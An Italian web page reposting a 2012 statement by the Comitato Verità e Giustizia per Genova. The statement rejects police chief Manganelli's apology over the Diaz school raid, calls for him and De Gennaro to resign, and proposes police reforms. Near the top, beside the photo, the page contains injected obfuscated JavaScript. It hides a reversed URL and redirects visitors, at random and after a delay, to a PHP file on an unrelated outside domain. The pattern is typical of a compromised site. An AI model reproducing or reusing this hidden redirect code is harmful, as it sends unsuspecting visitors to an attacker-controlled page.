Verità e Giustizia per Genova: "Le scuse non ci bastano, dimettetevi"

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/07/manganelli.jpg”>
Antonio Manganelli

Riceviamo e pubblichiamo

Il capo della polizia Antonio Manganelli dice che è arrivato da parte sua il momento delle scuse. La richiesta di scuse è un gesto che merita sempre rispetto e quindi, per la parte che ci riguarda, undici anni dopo i fatti e un giorno dopo la sentenza di Cassazione, e ha bisogno d’essere accompagnato da azioni concrete. Inoltre il dottor Manganelli non dice per che cosa chiede scusa. Per le violenze alla scuola Diaz? Per i falsi nei verbali? Per la costruzione di prove fasulle? O per i depistaggi e il boicottaggio sistematico, pluriennale delle inchieste della magistratura? Forse per le promozioni accordate ai dirigenti imputati? O per non averli sospesi dagli incarichi né al momento del rinvio a giudizio né dopo le condanne di secondo grado?

La verità è che il dottor Manganelli e il suo predecessore Gianni De Gennaro sono i maggiori responsabili, sotto il profilo morale e professionale, di tutto ciò che è accaduto nel caso Diaz fra la notte dei manganelli (21 luglio 2001) e il pomeriggio della Cassazione (5 luglio 2012), sono quindi responsabili di una condotta inaccettabile per una polizia democratica. Crediamo che il dottor Manganelli e il dottor De Gennaro, nel frattempo addirittura assurto a ruoli di governo, abbiano una via maestra da seguire, se vogliono dare un contributo alla credibilità della polizia e delle istituzioni: le dimissioni dai rispettivi incarichi.

La sentenza Diaz ha creato un autentico terremoto ai piani alti della polizia di stato e ha dato avvio a una fase nuova, che deve portare a una riforma democratica dei nostri apparati di sicurezza. Alcuni provvedimenti sono ormai urgenti:

Una seria legge sulla tortura;
L’obbligo per gli agenti in servizio di ordine pubblico di indossare codici alfanumerici che li rendano riconoscibili;
La cancellazione della riserva del 100% dei posti in polizia a chi presta servizio militare volontario.
La creazione di un’istituzione indipendente di tutela dei diritti umani, con poteri di indagine e di intervento disciplinare.

Comitato Verità e Giustizia per Genova, 6 luglio 2012


Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *